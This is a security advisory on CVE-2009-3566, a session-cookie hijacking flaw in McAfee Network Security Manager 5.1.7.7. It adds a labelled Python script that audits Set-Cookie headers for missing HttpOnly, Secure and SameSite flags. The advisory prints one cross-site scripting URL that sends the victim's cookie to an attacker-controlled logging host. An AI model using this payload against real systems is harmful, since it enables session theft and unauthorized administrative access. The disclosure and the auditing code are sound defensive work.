McAfee Network Security Manager is vulnerable to authentication bypass via HTTP session cookie hijacking. A remote attacker could exploit this vulnerability to hijack an existing session to the Network Security Manager.
Credit:
The information has been provided by Daniel King.
The original article can be found at: http://www.secureworks.com/ctu/advisories/SWRX-2009-002
Vulnerable Systems:
* McAfee Network Security Manager version 5.1.7.7
Immune Systems:
* McAfee Network Security Manager version 5.1.11.8.1
When a user loads the login page of the Network Security Manager, the server sets a cookie within the browser before authentication occurs. This cookie is accessible from client-side JavaScript because the HttpOnly flag is not set. An attacker with access to this cookie may gain privileged access to the Network Security Manager without the need to authenticate.
Best practice is to deploy the management console web application on a segmented management network.
The following demonstrates theft of the session identifier. A cross-site scripting vulnerability is leveraged to steal the cookie data. Example URL used in cookie theft: https://x.x.x.x/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb14%22%3E%3Cscript%3Enew%20Image().src=%22http://x.x.x.x/mcafee/log.cgi?c=%22%2BencodeURI(document.cookie);%3C/script%3E8b3283a1e57
Because the HttpOnly flag is not set on the cookie, the cookie data is available from client-side JavaScript. The URL above injects a JavaScript Image object within an XSS attack. The src property of the Image object is then set to a URL that contains a URI-encoded copy of the cookie data.
This causes the victim's browser to connect to that URL and attempt to fetch the image. Since the image does not exist, nothing is displayed in the victim's browser. The attacker's web server access logs will contain the victim's cookie data, including the session identifier. Using the victim's session identifier, the attacker can send a specially crafted HTTP request to the server that results in an authentication bypass.
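The root cause above is a session cookie issued on the login page without the HttpOnly flag. The following added example (not from the advisory or from McAfee) audits Set-Cookie headers for that weakness, and also for the related Secure and SameSite flags; the cookie name, path and header values are constructed samples, and the list of session-like cookie names is an assumption.

```python
"""Audit Set-Cookie headers for the weakness in the advisory: a session
cookie that is readable from JavaScript because HttpOnly is missing.
All sample headers below are constructed for this example."""
import re

# Assumed pattern for cookie names that usually carry a session identifier.
SESSION_NAMES = re.compile(r"(sess|sid|auth|token)", re.IGNORECASE)


def parse_set_cookie(header: str) -> dict:
    """Split one Set-Cookie value into name, value and lower-cased attributes."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for attr in parts[1:]:
        k, _, v = attr.partition("=")
        attrs[k.strip().lower()] = v.strip()
    return {"name": name.strip(), "value": value, "attrs": attrs}


def audit_cookie(header: str) -> list:
    """Return findings for a session-like cookie (empty when hardened)."""
    cookie = parse_set_cookie(header)
    attrs = cookie["attrs"]
    findings = []
    if SESSION_NAMES.search(cookie["name"]):
        if "httponly" not in attrs:
            findings.append("missing HttpOnly: exposed to document.cookie and XSS theft")
        if "secure" not in attrs:
            findings.append("missing Secure: may be sent over plaintext HTTP")
        if attrs.get("samesite", "").lower() not in ("lax", "strict"):
            findings.append("missing SameSite=Lax/Strict: sent on cross-site requests")
    return findings


def audit_response(headers: list) -> dict:
    """Audit every Set-Cookie header of a response, keyed by cookie name."""
    return {parse_set_cookie(h)["name"]: audit_cookie(h)
            for k, h in headers if k.lower() == "set-cookie"}


# Constructed sample login responses: pre-auth cookie without flags, and hardened.
WEAK_LOGIN_HEADERS = [("Content-Type", "text/html"),
                      ("Set-Cookie", "SESSIONID=abc123; Path=/intruvert")]
HARDENED_LOGIN_HEADERS = [("Content-Type", "text/html"),
                          ("Set-Cookie", "SESSIONID=abc123; Path=/intruvert; Secure; HttpOnly; SameSite=Strict")]

if __name__ == "__main__":
    for label, hdrs in (("weak", WEAK_LOGIN_HEADERS), ("hardened", HARDENED_LOGIN_HEADERS)):
        print(label, audit_response(hdrs))
```

Note that HttpOnly only prevents the script-based theft shown above; the fixed version also avoids issuing a privileged session before authentication, which a header audit cannot verify on its own.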
CVE Information:
CVE-2009-3566